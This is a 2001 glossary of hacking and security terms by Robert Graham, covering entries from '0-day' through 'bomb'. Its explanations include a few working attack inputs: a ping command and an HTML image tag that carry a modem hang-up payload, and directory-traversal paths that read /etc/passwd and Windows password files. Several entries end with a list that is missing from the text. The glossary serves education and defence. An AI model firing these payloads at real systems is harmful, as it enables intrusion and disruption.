URL: http://www.robertgraham.com/pubs/hacking-dict.html
Version
0.7.0, 2001-11-11
Copyright 1998-2001 by Robert Graham (mailto:hacking-dict1@RobertGraham.com. You may use this document for any purposes (including commercial) as long as you give me credit and include a link back to the original at http://www.robertgraham.com/pubs/hacking-dict.html.
[ $IFS | 'bot | .forward | .plan | /dev/null | /dev/random | /etc | /etc/hosts | /etc/hosts.equiv | /etc/inetd.conf | /etc/passwd | /etc/services | /etc/shadow | 0-day | 11 | 128-bit | 2600 | 3DES | 3DES_EDE | 40-bit | 56-bit | 64-bit | 8 | 8-character password | 802.11 | 802.1q | ~user ]
The term "0-day" describes the fact that the value of exploits quickly goes down as soon as they are announced. The next day they are half as valuable. The 2nd day they are a 1/4 as valuable. Ten days later they are 1/1000 as valuable as on day 0. This is because script-kiddies quickly use the exploits on computers throughout the Internet, compromising systems before anybody else can get to them.
Contrast: The term 0-day exploit describe the hard-to-use exploits by the discoverer himself (or close friends), in contrast to the easy-to-use scripts employed by script kiddies. For example, a buffer-overflow script will go through many phases as people try to find the right offsets for the target platforms, but will eventually end up as a broad-spectrum aim-and-shoot script that anybody could use.
Key point: One of the dangers of 0-day exploits is BUGTRAQ camping. A hacker discovers all the services running on the target victim and waits for day-0 when the exploit is announced. At that time, the hacker attacks the systems with the new exploit.
Key point: The term "0-day" describes any bit of information in the community, whether it is serial numbers, lists of proxies, or passwords to porn sites. As soon as such information becomes well-known and exploited by large numbers of people, it is then fixed by the victim. Information has a "half-life": the older it is, the less value it has.
Key point: The debate over strong encryption is never ending. Within the United States, law enforcement is constantly lobbying to restrict the use of strong encryption. Many resist, pointing out how often law enforcement already abuses wiretap powers (such as against Martin Luther King). At the same time, companies making products constantly lobby for the easing of export restrictions, so that they can sell strong encryption products abroad. Another funny thing is that the U.S. government's intransigence on this issue has actually led to stronger encryption abroad. U.S. export restrictions (and desire to spy on foreigners) was one of the reasons France relaxed its own law-enforcement bans on encryption use by citizens.
Key point: The random number generators within systems are often weaker than the key itself. For example, when you connect via SSL from your browser to a web-server, they choose a key for that session. That key is chosen with a random number generator. One estimate was that the average 128-bit session key contains only 47-bits of randomness. Other browsers have had even weaker systems allowing the session key to be recovered in only a few minutes.
Culture: This number is often used within the hacking culture. It is the name of a magazine (http://www.2600.com/) as well as that of a series of newsgroup (news:alt.2600).
Key point: Specialized hardware can decrypt 40-bit keys in real time. The average new desktop has enough horsepower to decrypt 40-bit messages. Thus, many people now consider 40-bit encryption to be simply obfuscated plaintext.
Key point: The term 40-bit often means the RC4 system within browsers.
Key point: In January of 1999, the EFF built a custom machine (the "Deep Crack") for $250,000 that could decrypt 56-bit DES encrypted messages in hours.
Key point: 56-bit cryptography almost always means DES.
Status: At the current time (year 2001), 802.11 is completely broken as far as security is concerned. There exists no solutions at this time that companies can use to create secure networks. However, within a couple years, it is likely that secure standards will be created.
Key point: The following techniques are used in an attempt to secure a wireless network:
Key point: An employee leaving the company is likely to know all necessary SSIDs, MAC addresses, and WEP keys in order to get back on the network. This means that they can sit in the parking lot and gain access to the network and/or sniff traffic. Unless better key-management techniques are standardized, 802.11 cannot be securely used in corporate environments.
Key point: Other 802.11 terms:
Point: IEEE 802.11b transmits in the 2.4 GHz radio band (the same as microwave ovens, so it is recommended to keep it away from your body). This band is unregulated by the U.S. government. This means that it is a desireable technology for creating ad-hoc networks. For example, satellite dishes can be used with 802.11 to connect networks up to 30-kilometers away from each other -- without government licenses.
Key point: Security conscious users of such systems need to make sure they use a more random mix of characters because they cannot create long passwords.
Key point: Password cracking such systems is a little easier.
Key point: Web-servers often allow access to user's directories this way. An example would be http://www.robertgraham.com/~rob.
Key point: A big hole on the Internet is that people unexpectedly open up information. For example, the file .bash_history is a hidden file in a person's directory that contains the complete text of all commands they've entered into the shell (assuming their shell is bash, which is the most popular one on Linux).
This file a is prime target of attackers. If they can overwrite this file, they can subtly start capturing the user's e-mail. This is especially dangerous if the the account in question is the root account. Note that the user doesn't have to know any about this file or have one on his system. The mere creation of this file by the intruder will activate this feature. Furthermore, since this file starts with a 'dot', it is normally hidden from the user, so they won't even be ware that this feature exists.
Key point: When rooting a
machine, intruders will often redirect logging to /dev/null For
example, the command
Culture: In the vernacular, means much the same thing as black hole. Typical usage: if you don't like what I have to say, please direct your comments to /dev/null.
Key point: If an intruder can read files from this directory, then they can likely use the information to attack the machine.
Hack: If you can write files to a user's machine, then you can add entries to his/her hosts files to point to your own machine instead. For example, put an entry for www.microsoft.com to point to your machine, then proxy all the connections for the user. This will allow you to perform a man in the middle attack.
Analogy: The European Union (EU) doesn't have passport control between countries. You only have to present your passport when entering the first European country, then you can roam freely once inside the union. The "hosts.equiv" file creates a similar union of machines.
Hack: Hackers will target this file. If their target is machine A, they may instead find that A trusts B, and B may be easier to break into first. At that point, the hacker can hop back to A using an account on B. Likewise, if a hacker can write to this file, they can tell the system to trust any other system on the network (including the hackers own machine).
Hack: Older software would do a reverse DNS lookup on a connecting IP address. If the hacker controlled the DNS server, s/he could return a trusted domain name, and therefore be allowed into the system. Another older hack is the default "+" entry.
See also: .rhosts
Key point: The passwords are encrypted, so even though everyone can read the file, it doesn't automatically guarantee access to the system. However, programs like crack are very effective at decrypting the passwords. On any system with many accounts, there is a good chance the hacker will be able to crack some of the accounts if they get hold of this file.
Key point: Modern UNIX systems allow for shadowed password files, stored in locations like /etc/shadow that only root has access to. The normal password file still exists, minus the password information. This provides backwards compatibility for programs that still must access the password file for account information, but which have no interest in the passwords themselves.
Key point: The chief goal of most hacks against UNIX systems is to retrieve the password file. Many attacks do not compromise the machine directly, but are able to read files from the machine, such as this file. Typical examples include:
Key point: /etc/passwd is a simple text file, with one line per account. The line is broken down into seven columns:
See also: shadowed passwords
Key point: Its role in life is so that programs can do a getportbyname() sockets call in their code in order to get what port they should use. For example, a POP3 email daemon would do a getportbyname("pop3") in order to retrieve the number 110 that pop3 runs at. The idea is that if all POP3 daemons use getportbyname(), then no matter what POP3 daemon you run, you can always reconfigure its port number by editing /etc/services.
Misunderstanding: This file is bad in order to figure out what port numbers mean. If you want to find out what ports programs are using, you should instead use the program lsof to find out exactly which ports are bound to which processes. If running lsof is not appropriate, then you should lookup the ports in a more generic reference.
[ A | access control | Access Control List | accountability | ACK | Acknowledgement Number | ACL | active attack | ActiveX | administrator | advocacy | AES | age | AH | algorithm | alias | amplifier | ANAC | Anarchist Cookbook | anarchy | ANI | anonymity | anonymous | anonymous FTP | ANSI | ANSI X9.17 | anti-replay | anti-virus | AP | Apache | application/form-url-encoded | area code | ARP | ARP redirect | ASN.1 | ASP | Assassination Politics | asymmetric cryptography | AT command set | attack | audit | audit trail | auth | authentication | Authentication Header | authenticity | Authenticode | authorization | automatic variables | availability | avatar ]
In formal terms, a "subject" (e.g. a user) attempts to access the "object" (e.g. system or data). An access control system will evaluate the security levels of the subject and object in order to see if access is permitted.
Example: A simple example is the case where you enter a username and password in order to log onto the computer.
Contrast:
Key point: There are different kinds of access. Read access means that somebody can read information, whereas write access implies that that somebody can change the data. For example, you can get a copy of your credit report and read it, but you can't necessarily change the data.
Key point: An Access Control List (ACL) is used to list those accounts that have access to the resource that the list applies to. When talking about firewalls, the ACL implies the list of IP addresses that have access to which ports and systems through the firewall. When talking about WinNT, the ACL implies the list of users that can access a specific file or directory on NTFS.
Contrast: Discretionary Access Control is the ability to have fine grained control over who has access to what resources.
Misconception: Many people believe that firewall IP address rules or IEEE 802.11 MAC address rules form robust ACLs. However, since neither IP addresses or MAC addresses provide robust authentication, such ACLs provide only a weak form of security. When these so-called ACLs are relied upon for security, they frequently lead to compromises as people spoof their IP or forge their MAC address.
Controversy: A major human rights debate these days is between accountability and anonymity. On one hand, you want to make criminals accountable for their actions, but this invades upon the privacy of individuals who do not want their every action recorded.
Contrast: The term accountability typically describes the issue of tracing actions back to individuals, whereas accounting describes actually recording those actions.
Examples:
Contrast: ActiveX is similar to Java applets, except that the code is not "sandboxed": it has full access to the operating system. In order to stop hostile code, ActiveX relies upon digital signatures and "zones". Microsoft browsers are configured to trust ActiveX programs from servers in the "trusted" zone, to trust signed ActiveX programs from servers in less trusted zones, and to prompt/deny unsigned ActiveX applets from untrusted zones.
Controversy: The idea of trusted zones and signed applets works pretty well in theory, but doesn't always work well in practice. The problem is that is relies upon on all users making the correct choices all the time. The Melissa virus/worm proved that this philosophy is not adequate.
Contrast: The main impetus behind AES to replace DES is the support for larger key sizes. DES uses 56-bit keys, which can be cracked in just a few minutes (in the year 2001). In contrast, AES supports 128-bit keys (as well as 192-bit and 256-bit). Whereas both DES and AES are fundamentally block-ciphers, AES is also designed to be an efficient stream-cipher and hash algorithm. Whereas DES was designed to be hardware based (software implementations are much slower), AES has been designed to be efficient in both software and hardware. In particular, implementations in ANSI C, Java, and x86 assembly language were important. Another important criteria was the ability for the algorithm to work within smart-cards with slow CPUs and limited memory.
Key point: The NIST director in charge of selecting the AES algorithm says: "If Moore's law continues and quantum computing doesn't manifest itself, then I think this system will have a good 30 year run".
Misconception: AES does not replace DES. In the 1980s, DES was the most used encryption algorithm. However, due to length of time it took the government to come up with a replacement standard, other encryption algorithms became widely used, such as RC2, RC4, Blowfish, IDEA, and Triple DES. Moreover, crypto has became very "pluggable", with many products supporting numerous simultaneous encryption algorithms.
Analogy: An cookbook recipe is an algorithm.
Key point: Different algorithms have different levels of complexity. For example, consider the ancient parable (Babylonian?) about a king and a wise subject who did a favor for him. The subject asked for one piece of grain to be placed on the first square of a chess board, two grains on the second, four grains on the third, and so on, doubling the amount of grain for each successive square.
This problem demonstrates an algorithm of exponential complexity. For the first 10 squares of the chess board, the series is: 1 2 4 8 16 32 64 128 256 512. Thus, for the first 10 squares, roughly a thousand grains must be paid out. However, the series continues (using K=1024): 1k 2k 4k 8k 32k 64k 128k 256k 512k. Thus, for the first 20 squares, roughly a million grains must be paid out. After 30 squares, roughly a billion grains must be paid out. For 40 squares, roughly a trillion grains must be paid out.
This is directly related to such things as key size. A 41-bit key is twice as hard to crack as a 40-bit key. A 50-bit key is a thousand times harder. A 60-bit key is a million times harder. This is why the 128-bit vs. 40-bit encryption debate is so important: 128-bit keys are a trillion trillion times harder to crack (via brute force) than 40-bit keys.
Key point: Most algorithms are public, meaning that somebody trying to decrypt your message knows all the details of the algorithm. Consequently, the message is protected solely by the key. Many people try to add additional protection by making the details of the algorithm secret as well. Experience so far has led to the belief that this actually leads to weaker security for two reasons. First, such secrets always get discovered eventually, so if security depends upon this secret, it will eventually be broken. Secondly, human intelligence is such that someone cannot create a secure algorithm on his/her own. Therefore, only by working with a community of experts over many years can humans create a secure algorithm. To date, only two such communities exist: the entire world of cryptography experts publishing the details of their work and trying to break other people's work, and the tightly knit community of cryptography experts working in secret for the NSA.
Example: The classic example is the smurf amplifier. An attacker spoofs the address of a victim and sends directed broadcasts to the amplifier, which then sends hundreds of replies back to the victim. Thus, it only costs the attacker a single packet to send many packets to the victim.
Example: A more subtle attack is the use of DNS. The DNS response packet can be much larger than the request. This allows an attacker to flood the victim with large packets at the cost of small packets.
Contrast: Cyberspace anarchy and real-world anarchy are different. The main thrust is that cyber-punishment should fit cyber-crime, and physical-punishment should only be used in cases of physical-crime.
Example: Most of the cyber-anarchy focuses on cryptography, or crypto-anarchy. This is because most anarchic capabilities will be based in cryptography.
Humor: Anairchists believe in the lack of odor.
See also: cypherpunks
Contrast: While on the service ANI is similar to Caller ID, it is actually a completely different system. ANI predates Caller ID by about 50 years. Since the systems are independent, the numbers recorded for ANI and Caller ID can be different. Also note that the "*67" technique of blocking Caller ID has no affect on ANI.
Example: The term ANAC (Automatic Number Announcement Circuit) will echo back the number you are calling from, either from ANI or Caller ID. They are popular among beige boxing pheakers in order discover the telephone number of the lines they tap into. It is also useful for coporate stooges that are having problems with 800 services because the phone number revealed by ANI about the extension is significantly different that the number they think it is. There really is no number dedicated to ANI discovery (other than 1-800-MY-ANI-IS used in the old days); these numbers are for other purposes, such as automated telephone customer service. Some numbers that are currently active as of August, 2000:
Point: As of 1998, ANI-II is starting to provide extra digits on the end of the telephone number indicating the type of number. The numbers "00" indicate POTS (plain old telephone service), "63" indicates a roaming PCS/cellular caller, "70" is a type of a payphone, etc.
Example: Anonymous e-mail services like Hotmail put the IP address of the person sending the e-mail in the headers (which are normally hidden from view by e-mail clients). Many would-be hackers get caught this way.
Example: France is currently trying to outlaw Internet anonymity, forcing uses to disclose their identity.
Contrast: Anonymity is one aspect of privacy.
Contrast: ANSI is the American representative to the ISO. ANSI is made up of industry, whereas NIST specifies standards only for use within government.
Example: The following are infosec related standards by ANSI. The X9 group are Financial Industry Security Standards, but used elsewhere as well.
Key point: By sniffing ARP packets off the wire, you can discover a lot of stuff going on. This is especially true of cable-modem and DSL segments. Since ARP packets are broadcasts, you aren't technically breaking your user's agreement by sniffing.
Key point: You can spoof ARP requests and/or responses in order to redirect traffic through your machine.
Key Point: Some carribean countries have U.S. area codes. A common telco fraud is to fool people into calling those numbers. The consumers believe that their are calling a U.S. number protected by fraud laws, when in reality they are dialing a pay service that will charge them upwards of $2 a minute. North American Area Codes Outside the U.S. and Canada
| 242 | Bahamas | 664 | Montserrat | |
| 246 | Barbados | 758 | St. Lucia | |
| 264 | Anguilla | 767 | Dominica | |
| 268 | Antigua & Barbuda | 784 | St. Vincent & the Grenadines | |
| 284 | British Virgin Islands | 809 | Dominican Republic | |
| 345 | Cayman Islands | 868 | Trinidad & Tobago | |
| 441 | Bermuda | 869 | St Kitts & Nevis | |
| 473 | Grenada | 876 | Jamaica | |
| 649 | Turks & Caicos Is. |
Link: See the website http://www.nanpa.com/ for more information on NANP (North American Numbering Plan).
Key point: A recurring bug in ASP has allowed hackers to read the script rather than the output of the script. These techniques rely upon changing the name of the script such that the server not longer recognizes it as a script, but as a file instead. Some techniques that have worked in the past have been:
Key point: ASN.1 is used within many areas of security to declare data structures and compatible file/network encodings of those data structures. For example, your X.509 Certificate is an ASN.1 encoded file.
Example: The following shows an ASN.1 structure compared to a C++ structure.
struct UserRecord {
bool account_disabled;
int user_type;
char *user_name;
char *password;
};
UserRecord ::= [APPLICATION 0] IMPLICIT SEQUENCE {
account_disabled BOOLEAN,
user_type INTEGER,
user_name OCTET STRING,
password OCTET STRING
}
Key point: ASN.1 defines structures abstractly, which means it doesn't really specify the concrete representation. There are many ways to encode an ASN.1 structure in binary. There are three popular sets of encoding rules:
The command "ATH0" means to hang up the modem.
Key point: One of the juvenile tricks people play is to cause people to hang up their own modem. Once the modem connects, it goes into a different mode where it no longer accepts AT commands. However, a user can switch back to the command mode by sending the characters "+++" to the modem. Therefore, if somebody can remotely trick your PC into sending "+++ATH0", then your modem will hang up. One way of doing this is with the ping program that sends and ICMP echo to the victim, which then replies with the same contents. E.g.:
ping -p 2b2b2b415448300d victim
The most popular exploits for this are spoofed ICMP pings, but it can be exploited in any number of ways. For example, one may include the following in an HTML webpage:
<IMG src="http://www.robertgraham.com/images/x.gif?+++ATH0">
Example: Some classifications of attacks against computers are:
The first is the security audit, whereby a consulting firm comes in and validates a companies security profile. This is similar to how accounting firms review a company's books.
The second term is infosec specific, and means an "auditing" subsystem that monitors actions within the system. For example, it may keep a record of everyone who logs onto a system. Such a record is known as an audit trail.
Contrast: Authentication will identify who an individual is; authorization will identify what the individual is allowed to do.
Example: When you log in with your username and give the password, you are authenticating yourself to the system. You are proving that you are you because, in theory, only you know your password.
Contrast: Abstractly, anything that combats forgery is called authentication. For example, IPsec includes an Authentication Header (AH) that proves that a packet hasn't been modified in transit. However, this feature overlaps with the abstract concept of integrity: both are checked at the same time.
Examples:
Contrast: Three things used for
See also: Authentication is often mentioned along with other key security concepts such as integrity, confidentiality, and non-repudiation.
Contrast: The terms integrity and authenticity are widely used to mean the same thing. In other situations, they have subtly different meanings (especially law). The term integrity generally describes defending against malicious change of a message once it has been sent, whereas authenticity implies some sort of validation of the sender of the message to protect against forgeries.
Contrast: The terms authentication and authenticity are widely used to mean the same thing. The subtle difference is that authentication is about someone proving who they say they are, whereas authenticity is about proving that message was sent by a certain person.
Contrast: The first stage of authorization is generally authentication. Before you decide what an individual is allowed to do, you must first establish who they are. In some cases, authorization is independent from authentication, such as not allowing anybody to logon after midnight.
Controversy: Availability is one of the key sticking points in security. It is easy to secure things simply by making them unavailable: if a computer is turned off, nobody can hack into it. The trick to infosec is making things both available and secure. Examples of this problem are:
Antonym: The opposite of the infosec term "availability" is the hacking term "DoS".
See also: Availability is often mentioned along with other key security concepts such as integrity, authentication, confidentiality, and non-repudiation.
Key point: Most common people don't understand cyberspace, and assume that their physical body and digital manifestation are the same thing. The hacking culture has a very different point of view that there is no direct corpespondance between a real person and their online identity.
See also: pseudonym
[ back channel | back door | Back Orifice | backtrack | backtracking | banner | BASE64 | bash" | bastion host | BBS | Bcc | beige box | Bell-LaPadula Modle | BER | BGP | big-endian | binary | BIND | BinHex | biometrics | BIOS | birthday attack | birthday paradox | bit | black | black bag job | black-hat | BlackNet | Blind spoofing | block cipher | Blowfish | Blue Team | BlueBEEP | boink | bomb | bonk | boot sector | bootp | box | broadcast | broadcast domain | browser | brute force | BS7799 | BSD | buffer overflow | buffer overrun | bug | BUGTRAQ | BXA | byte-order ]
Contrast: Remote administration trojans (RATs) are NOT examples of back channels, but are instead forward channels. A RAT allows the hacker to contact the system from anywhere in the world, and allows the hacker to hide where he/she is coming from. A back channel, on the other hand, will contact the hacker, who must have a fixed IP address. This clearly fingers who the hacker is.
Key point: Typical back channel protocols are X Windows (xterm) and shells like Telnet. These programs are often built into the victim's system, so many attacks that can't otherwise compromise the system can still trigger a back channel that allows a remote shell.
See also: covert channel
Example:
Key point: Key features of backdoors are:
Key point: Back doors are frequently programmed into systems either benignly or maliciously. Most computers shipped today allow BIOS passwords to be set that will prevent the booting of the computer without the administrator first typing the password. However, since many people lose their password, such BIOSes often have a back door passwords that allows the real password to be set. Similarly, a lot of remotely manageable network equipment (routers, switches, dialup banks, etc.) have backdoors for remote Telnet or SNMP. The frequency of such back doors is due to the fact that people are stupid, set passwords, forget them, then whine to customer support.
Key point: A backdoor can be added to any system. For example, when generating random session keys, a programmer may actually subvert the random number generator. Such subversion would then allow decrypting of the message by those who knew the specifics. This has already been done accidentally; some paranoids believe that some encryption products do this intentionally in order to get export approval of 128-bit products.
See also: trap-door
Example: Many programs contain built-in HTTP servers. This allows the program to be remotely managed from any web browser. These servers expect that only the files in their own directory and below will be read. However, hackers can still provide URLs that go up directories, and down into other directories in order to read any file from the system. For example, a hacker may be able to read the UNIX password file by typing in the URL: http://www.robertgraham.com/../../../etc/passwd.
Key point: This bug occurs because programmers frequently forget to double-check input.
Example: This bug is common. The original version of Win95 had this bug, so that if you had access to File and Print Sharing to any subdirectory, you also had access to the entire system. A huge number of HTTP servers and CGI scripts have this bug. Many FTP servers have had this bug. Even though this bug has been exploited for over 15 years, new variations of this technique are constantly being discovered in new programs.
Key point: Win9x has the quirk that three dots "..." means "two directories up", four dots "...." means "three directories up", and so on. Additionally, whereas on many UNIX systems going up past the top directory automatically generates an error, going above the top directory on Windows leaves you in the top directory. Therefore, filenames like "............/Windows/greg.pwl" are frequently seen: the hacker puts more than enough dots in the path in order to guarantee they reach the root directory.
Key point: Many popular Windows "personal web servers", including several versions shipped from Microsoft, have had either the "../.." or "....." vulnerability. In particular, since the "....." issue is not widely know, it is very common among those products that fix the first variant. FrontPage98 from Microsoft shipped with this bug.
Key point: Many banners reveal the exact version of the product. Over time, exploits are found for specific versions of products. Therefore, the intruder can simply lookup the version numbers in a list to find which exploit will work on the system. In the examples below, the version numbers that reveal the service has known exploitable weaknesses are highlighted.
Example: The example below is a RedHat Linux box with most the default service enabled. The examples below show only the text-based services that show banners upon connection (in some cases, a little bit of input was provided in order to trigger the banners). Note that this is an older version of Linux; exploits exist for most these services that would allow a hacker to break into this box (most are buffer-overflow exploits).
| Protocol | Port | Banner |
|---|---|---|
| FTP | 21 | 220 rh5.robertgraham.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Sat Nov 1 03:08:32 EST 1997) ready. |
| ssh | 22 | SSH-2.0-2.1.0 SSH Secure Shell (non-commercial) |
| Telnet | 23 | Red Hat Linux release 5.0 (Hurricane) Kernel 2.0.31 on an i486 login: |
| SMTP | 25 | 220 rh5.robertgraham.com ESMTP Sendmail 8.8.7/8.8.7; Mon, 29 Nov 1999 23:28:31 -0800 |
| finger | 79 | Login Name Tty Idle Login Time Office Office Phone rob Robert David Graham p0 Nov 29 22:51 (gandalf) root root p1 Nov 29 23:34 (10.17.128.201:0.0) |
| HTTP | 80 | HTTP/1.0 200 OK Date: Tue, 30 Nov 1999 07:34:59 GMT Server: Apache/1.2.4 Last-Modified: Thu, 06 Nov 1997 18:20:06 GMT Accept-Ranges: bytes Content-Length: 1928 Content-Type: text/html |
| POP3 | 110 | +OK POP3 rh5.robertgraham.com v4.39 server ready |
| identd | 113 | 0 , 0 : ERROR : UNKNOWN-ERROR |
| IMAP4 | 143 | * OK rh5.robertgraham.com IMAP4rev1 v10.190 server ready |
| lp | 515 | lpd: lp: Malformed from address |
| uucp | 540 | login: |
Best practices: It is often recommend (and required in some government areas) to display a banner warning off unauthorized users. It makes the legal case stronger if you can show that the attacker saw a banner that indicated that they were unauthorized.
Best practices: All version information should be supressed in the
banners. See the product documentation for more information on this. An
example on Solaris is to edit the configuration file
/etc/default/telnetd and added the line:
BANNER=""
This
will remove the Solaris login banner, making it more difficult for an intruder
to determine the type of operating system.
| SunOS 5.7 login: |
login: |
| Service | File | Parameter |
|---|---|---|
| Sendmail | sendmail.cf | O SmtpGreetingMessage= |
| Sun FTP | /etc/default/ftpd | BANNER="" |
| Sun Telnet | /etc/default/telnetd | BANNER="" |
See also: firewall
...a means of restricting access to objects based on the sensitivity (as represented by a label) of the information contained in the objects and the formal authorization (e.g., clearance) of subjects to access information of such sensitivity
In this definition, a "subject" is somebody (user) who wants access to an "object" (information, data file, system). The subject and object have different security levels.
Objects (information, data, systems) are assigned security
classification levels. A typical example would be:
unclassified
< confidential < secret < top-secret
Subjects are assigned similar clearance levels that allow access to objects of similar level or below. For example, if you are a government employee with "secret" clearance level, you can access everything but "top-secret" information.
A classification level such as "top-secret" will also include categories. For example, you may have a "secret" clearance for NATO information, and "top-secret" clearance for all matters pertaining to nuclear weapons. The system follows the principle of least privilege. Therefore, you would not be cleared to access top-secret NATO nuclear plans because your NATO clearance isn't high enough.
Netiquette: USE BCC!!! It is a security breach to reveal people's e-mail addresses to others. For example, one of the recipients may be an MLM seller and will start spamming the other recipients. Another breach is a virus like Magister.B that will forward itself to addresses it finds while scanning the Inbox. There are cases where you want recipients to know about each other, but if you can't come up with a reason, you should use "Bcc:" instead of "Cc:" or "To:" fields.
Key point: BGP can be subverted in many ways. BGP is generally unauthenticated, and rogue ISPs can play havoc.
Contrast: The word binary usually means not text. In computers, every 8 binary digits are used to represent a byte. However, only 7 binary digits are needed to convey text (26 upper case, 26 layer case 10 decimal digits, a number of punctuation characters, etc). Therefore, data using just 7 binary digits per bytes is always text data. It is pointless to say binary computer data, since all computer data is binary. When someone says binary, rather than being redundant, what they are really trying to convey is that the data in question isn't text data. For example, FTP is a text protocol, whereas SMB is a binary protocol.
Misconception: The word is also a noun (as well as the usual adjectival sense). A binary is a file containing binary (as opposed to text) data. In particular, you may hear the phrase "hackers replace the binaries on a the victim's machine". What this really means is that the hackers have replaced many of the software programs (with trojans). This phrase comes about because executable programs contains binary, not text data. Therefore, a machine's binaries are its programs.
See also: A common issue is how to send binary data within a text protocol/message. For example, how can we send a binary within a text e-mail message? The answer is to "encode" the data. See the word encoding for more details.
History: The ancient Egyptions used biometrics in order to verify somebody's identity. They would make several measurements of body features (e.g. length of arms) and record them. Fingerprints have actually only been used in the last 100 years.
Example: The market for biometrics in the year 2000 was roughly $100 million. There are many methods, each with their own pros and cons (accuracy, ease of use, end-user prejudice, etc.).
Point: One area of biometrics focuses on those cases where the user isn't aware of the scan. For example, an airport may have a facial features scanner design to trigger on known terrorists. Equipment could be installed under the floor in order to discover people according to their gait as they walk over them (such systems can distinguish among multiple people walking simultaneously). Body odor and DNA can be extracted from a persons "thermal plume" as they walk under a sniffing system.
Controversy: Biometrics introduces huge privacy debate. For the first time, it provides the government with a means to track its citizens in a manner that the citizens cannot avoid. This gives totalitarian governments the ability to tightly control their populations. At the same time, it provides businesses equal opportunity to invade their employees and customer's privacy.
Controversy: Biometrics is based upon a single, unalterable identity. A private-key, for example, can be destroyed in case it is compromised (through key revocation). However, your biometrics are with you for life. Today's authentication is usually through pseudonyms that are only roughly related to who you really are.
Key Point: Biometrics has a number of problems. The first is that biometric measurements get worse over time. People's signatures change over time. An injury can change fingerprints. Voice recognition systems fail when people have cold. Not all people have the requisite physical features (eyes, hands, etc).
Pros: Biometrics cannot be forgotten; many companies are adopting biometrics as a cost saving issue because lost passwords is becoming a leading problem in IT departments. Biometrics cannot be passed on from one person to another. Biometrics are extremely difficult to forge.
Culture: Biometrics have appeared frequently in movies, partially because of the Orwellian horros they ellicit from the audience. The entire plot of the movie Gataca was based upon DNA biometrics. The Bond film "Diamonds are Forever" used a trick of thin rubber over the fingertips to forge someone else's fingerprints -- a trick that has been recently shown to work. Another Bond film used the trick of surgical change in order to forge an iris scanner.
Key point: The BIOS stores configuration settings in NVRAM (Non-Volatile RAM). Remember that the contents of your normal RAM/memory are lost when you power-off your computer. The contents of NVRAM, in contrast, are retained when power goes off. Most NVRAM consists of CMOS (low-power) chips with a small battery that constantly feeds power to the chips (such batteries last about 5-years). A common trick of hackers and viruses is to corrupt the CMOS settings causing the computer to fail to boot. Removing the battery connection (usually a jumper on the motherboard) will cause the CMOS settings to be lost and be reset back to default (good) state.
Key point: All of today's BIOSes are stored in programmable ROMs, which allows them to be reprogrammed (usually with bug fixes from the manufacturer). This allows the hacker to reprogram them as well. While in theory hackers could reprogram their own code into the BIOS, in practice this has not been done yet. Instead, hackers can sometimes use this programming feature to corrupt the BIOS code (in much the same way they corrupt the BIOS settings mentioned above). This will usually prevent the system from booting even to a point where a fresh BIOS can be re-programmed into the system. This requires that the system be brought back to the vendor in order to have the BIOS reprogrammed. Note that you can often set a jumper on the motherboard that denies the ability to reprogram the BIOS.
Misconception: Naive users who get hacked often come up with the belief that the hacker has gotten into their BIOS and left some sort of backdoor behind. While such a thing is possible in theory, it never happens in practice.
Key point: Many BIOSs can be locked with a boot password. This prevents somebody from booting the machine without the password. However, for technical support reasons, they generally have backdoor passwords. Some of them are listed below. By the time you read this, these are likely to be out-of-date. However, if you type these strings into a search engine, you will probably be able to find the latest ones.
Key point: BIND provides about 80% of all DNS services. It is also enabled by default on a lot of Linux distributions. As a result, any exploit discovered for BIND has immediate and large impact on the Internet. As of November, 1999, all versions of BIND previous to 8.2.2-P5/4.9.7 have known holes that can be exploited. It is likely that these newer versions also have undiscovered exploitable holes as well.
Key point: BIND comes in two versions, 4.x and 8.x. This is largely due to backwards compatibility: people are running a lot of older servers and would rather patch them than upgrade to a newer version. Also, the newer 8.x code-base has not be extensively peer-reviewed and is thought to be a lot less secure than the 4.x source base. UPDATE: BIND v9 is now available, though most users are sticking with v8.
Another way of looking at it is that most school classrooms have more than 23 students. Therefore, in more than half of all school classrooms, two students have the same birthday.
The reason this is surprising is because we are accustomed to thinking in terms of somebody having the same birthday as ourselves. In a room with 20 people, there is less than a 5% chance that somebody else has the same birthday as ourselves.
Key point: This fact is important in cryptography. For example, the cryptographic hash function creates a "unique" fingerprint of a file. It is virtually impossible for an attacker to create another messages that matches that unique fingerprint. However, there may be cases where an attacker wants to create two new messages with the same fingerprint. This second problem is a lot easier than the first. The attacker may want to create two contracts, then after having the first one digitally sign, substitute the second one in its place. For this reason, a common recommendation for third-party signature services is to add a seal along with the signature in order to change the resulting hash.
Example: Consider MD5 whose hash has a length of 128-bits. This means that creating a message that hashes to the same value as the first message would take 2128 brute-force attempts. However, choosing two messages that together hash to the same value takes only 264 attempts. In other words, if you have to create a match an existing message, the problem is tough, but if you can create both messages, the problem is easy. The upshot is that many cryptographic algorithms have to be strong enough to defend also against birthday attacks.
Key point: In many contexts, each additional bit means "twice as much". 8 extra bits means 256 times as much. 16 extra bits means 65536 times as much. Therefore, it takes 65536 times longer to brute force crack a 56-bit key than a 40-bit key.
Key point: The inadvertent connection between black and red networks is one of the chief concerns of military-grade security.
Terminology:
History: in 2000, the FBI secretly entered the office of Nicodemo Scarfo and installed a keylogger. The FBI was able to capture Scarfo's password and decrypt his PGP encoded e-mail.
History: The 1971 Watergate snafu was an illegal black-bag operation.
History: In October of 1993, Attorney General Janet Reno authorized the FBI to enter the home of Aldritch Ames, a suspected CIA mole. This was after months of of electronic and physical surveillance, including searches of his trash.
Key point: Authorized black-bag jobs are sometimes part of pen-tests.
Controversy: Many believe that black-bag jobs are in violation of the Fourth Ammendment.
In the class of hostile software, a logic bomb is some code left behind by a program that "goes off" at a particular time (such as deleting all the files on the computer on New Years Eve). One theory was that Y2K consultants left logic bombs inside the code they were fixing in order to earn even more money after Y2K.
A mail bomb is the effect of sending somebody tons of e-mail (or large e-mail), overloading their mailbox and/or network connection. Sometimes this can be done with a program, other times it can be done simply by signing up the victim to huge numbers of e-mailing lists. Finally, it can be accidental, as happened once to Apple Computer when its mailing list software got out of control.
A time bomb is a bit of malware inserted into a system set to go off at a specific date.
History: In the old days of UNIX terminals, an e-mail message containing VT100 control codes in a logic bomb could completely hose a user's terminal, forcing them to log out. DOS machines supporting the ANSI.SYS driver also had that problem.
Example: Some well known programs for e-mail bombing are: Unabomber, Kaboom, UpYours, and Avalanche.
